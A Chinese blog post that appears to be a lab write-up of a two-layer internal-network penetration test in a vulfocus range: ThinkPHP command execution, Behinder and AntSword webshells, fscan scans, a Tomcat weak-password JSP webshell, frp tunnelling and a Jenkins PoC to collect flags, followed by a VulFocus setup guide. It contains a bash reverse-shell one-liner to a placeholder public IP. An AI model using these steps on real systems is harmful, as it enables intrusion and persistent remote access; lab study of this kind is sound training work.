【靶场】双重内网渗透测试场景

文章详细描述了一次内网渗透测试的过程,首先利用thinkPHP的命令执行漏洞获取shell,然后通过冰蝎建立代理,进行fscan扫描和横向移动到Tomcat服务器,利用弱口令上传jsp木马。接着,通过frp建立更稳定的隧道,穿透内网限制,最终在Jenkins服务器上找到flag并完成信息收集。虽然过程中遇到一些权限问题和隧道不稳的情况,但通过调整方法成功实现了目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


前言

使用vulfocus搭建一个内网场景靶场拓扑如下:
在这里插入图片描述
入口有两个,一个是think PHP2.x命令执行和5x的命令执行漏洞,后续需要搭建二层隧道进行渗透测试。

一、开始渗透

目标:
在这里插入图片描述

访问一下:
在这里插入图片描述

使用工具直接拿shell
在这里插入图片描述
使用蚁剑连接:
在这里插入图片描述
写入冰蝎马做简单代理:
在这里插入图片描述
使用冰蝎连接:
在这里插入图片描述
做一下信息收集:
上传fscan扫一下:
上传发现冰蝎命令无法使用感觉应该是权限问题:
在这里插入图片描述
加权限后一样不能使用,就直接使用蚁剑连接上传fscan:
在这里插入图片描述
进入文件检查发现bash没有无法执行:
在这里插入图片描述
这里直接用thinkphp2x的漏洞做横向移动:
在这里插入图片描述
这里直接上传冰蝎马做代理:
在这里插入图片描述
在这里插入图片描述
上传fscan:
在这里插入图片描述
执行扫描:
在这里插入图片描述

二、横向移动

查看扫描结果:
发现tomcat 的ip为192.168.20.1:8080
在这里插入图片描述
这里使用冰蝎简单代理给他代理出来:

在这里插入图片描述
成功代理到本地的8080端口:
注意这种方式不稳定不怕麻烦使用frp代理
在这里插入图片描述
上传webshell:这里是tomcat弱密码漏洞
在这里插入图片描述
上传jsp木马:
在这里插入图片描述
直接用冰蝎连接:
在这里插入图片描述
查看网卡:
在这里插入图片描述
网卡中有30网段:测试是否出网
在这里插入图片描述
目标可以出网进行反弹shell(因为这里的冰蝎隧道不稳定):
这里使用nc做监听:
在这里插入图片描述

bash -i >& /dev/tcp/公网ip/端口 0>&1

这里使用bash编译命令
在这里插入图片描述
在这里插入图片描述
成功反弹:
在这里插入图片描述
这里写入frpc的配置:
使用冰蝎上传frpc包:
在这里插入图片描述
这里发现冰蝎的隧道并不稳定上传10M的文件太大导致没有上传成功,换成wget命令:
直接在公网服务器放安装包使用wget命令下载到本地做隧道:
在这里插入图片描述
测试一下下载:
在这里插入图片描述

在tomcat中下载:
在这里插入图片描述
在这里插入图片描述
解压并配置frpc:
在这里插入图片描述
使用vps上启动frpserver服务:
在这里插入图片描述
在这里插入图片描述

执行./frpc -c frpc.ini

在这里插入图片描述

流量转发过来
在这里插入图片描述
使用proxifier代理到vps的服务器:
在这里插入图片描述
在这里插入图片描述
成功穿出:
接下来做信息收集关闭之前搭建的冰蝎隧道(不稳定且延迟较高):
在这里插入图片描述
直接使用冰蝎连接192.168.30.3:8080的马:
在这里插入图片描述
在这里插入图片描述
这个相对稳定:上传fscan做信息收集

在这里插入图片描述
加个权限启动扫描:
在这里插入图片描述
Jenkins的ip为192.168.30.1:端口为8080使用poc攻击:
在这里插入图片描述
在这里插入图片描述
这里直接拿flag:
在这里插入图片描述
到这里我们四台的flag全部找到可以提交了:

提交flag

在这里插入图片描述
这里只有四个场景但是不知道为啥有5个flag并没有找到另外的flag应该是靶场的bug,这里不在深究

总结

这个场景还是比较简单,如果目标不出网,也可以在tomcat上做frpserver服务,让他又当客户机又当服务器,同时还可通过msf做代理和上线cs做权限维持,下次使用这种方式做测试,试试效果如何。

### VulFocus 安全漏洞学习平台使用指南 #### 平台概述 VulFocus 是一个专注于安全研究和教育的漏洞集成平台,允许用户通过简单的操作来部署各种基于 Docker 的漏洞环境镜像。这使得研究人员能够快速搭建并测试不同的漏洞场景,从而提升网络安全技能[^1]。 #### 主要功能特点 - **便捷性**: 用户只需将所需的漏洞环境Docker镜像导入到平台上就可以立即投入使用; - **自动化程度高**: 提供了自动化的安装向导以及详细的文档支持,降低了初次使用者的学习曲线; - **丰富的资源库**: 内置了大量的官方维护或者社区贡献的安全实验案例可供选择; #### 准备工作 为了顺利运行此平台,建议先完成以下准备工作: ##### 安装依赖软件 确保主机上已经正确安装了最新版本的 Docker 及其扩展工具 Compose 。对于大多数Linux发行版而言,可以按照官方说明进行设置[^2]。 ```bash sudo apt-get update && sudo apt-get install -y docker.io docker-compose ``` ##### 下载与配置 获取最新的 VulnBox 发布文件,并解压至指定目录下。接着修改 `config.json` 文件中的必要参数以适应本地网络状况和其他个性化需求。 #### 启动服务 进入项目根目录执行启动命令将会拉取必要的容器映像并将它们组合成完整的应用集群。 ```bash cd /path/to/vulfocus/ docker-compose up -d --build ``` #### 访问管理界面 打开浏览器访问 http://localhost:80 或者根据实际情况调整 IP 地址端口号,登录默认账号密码 admin/admin 即可开始探索更多有趣的功能模块。 #### 实验室构建流程 当决定创建一个新的实验室时,可以从在线仓库挑选合适的模板或是上传自定义制作好的压缩包形式的 Dockerfile 描述文件。之后填写好名称描述等基本信息提交保存便完成了整个过程。 #### 注意事项 虽然该平台极大地简化了传统方式下的复杂度,但在实际操作过程中仍需注意保护个人隐私数据不被泄露给第三方机构或恶意程序利用造成损失风险。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值